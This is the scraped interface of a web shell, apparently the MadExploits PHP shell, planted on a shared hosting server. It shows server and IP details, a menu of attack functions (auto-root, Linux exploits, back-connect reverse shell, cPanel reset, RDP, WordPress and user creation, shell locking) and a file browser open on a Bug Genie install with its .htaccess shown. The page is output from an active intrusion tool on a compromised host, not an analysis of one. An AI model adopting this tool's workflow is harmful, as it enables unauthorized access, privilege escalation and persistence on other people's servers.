Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.191.178.16
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
buggenie /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
.htaccess
1.14
KB
-rw-r--r--
_upgrade.php
5
KB
-rw-r--r--
_upgrade.xml
460
B
-rw-r--r--
b2db.yml
172
B
-rw-r--r--
clone.php
6.18
KB
-rw-r--r--
edit.php
5.51
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
304
B
-rw-r--r--
import.php
5.26
KB
-rw-r--r--
info.xml
3.29
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
8.04
KB
-rw-r--r--
install.xml
942
B
-rw-r--r--
installed
31
B
-rw-r--r--
md5
12.44
KB
-rw-r--r--
notes.txt
665
B
-rw-r--r--
update_pass.php
114
B
-rw-r--r--
upgrade
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# .htaccess file for The Bug Genie # Follow symlinks. Options +SymlinksIfOwnerMatch # Options +FollowSymlinks # Apply rewrite rules for pretty URLs. <IfModule mod_rewrite.c> RewriteEngine On # If you have a non-typical set-up, you can set the RewriteBase in order to # make sure that base URLs when generating rewritten URLs are set correctly. # # For example: # # Rewrite Base / # # Rewrite Base /dev/thebuggenie # RewriteBase [[relativeurl]]/public/ # Try serving a file (if non-zero size), file or directory pointed to by # symlink, or directory directly. If so, serve that file/directory # unmodified, and do not apply any further rewrite rules. RewriteCond %{REQUEST_FILENAME} -s [OR] RewriteCond %{REQUEST_FILENAME} -l [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^.*$ - [L] # Redirect any other request to front controller. Use case-insensitive # matching, making sure to append any additional query strings # passed-in. Once the rewrite has been done, do not apply any further # rewrite rules. RewriteRule ^(.*)$ index.php?url=$1 [NC,QSA,L] </IfModule>
Close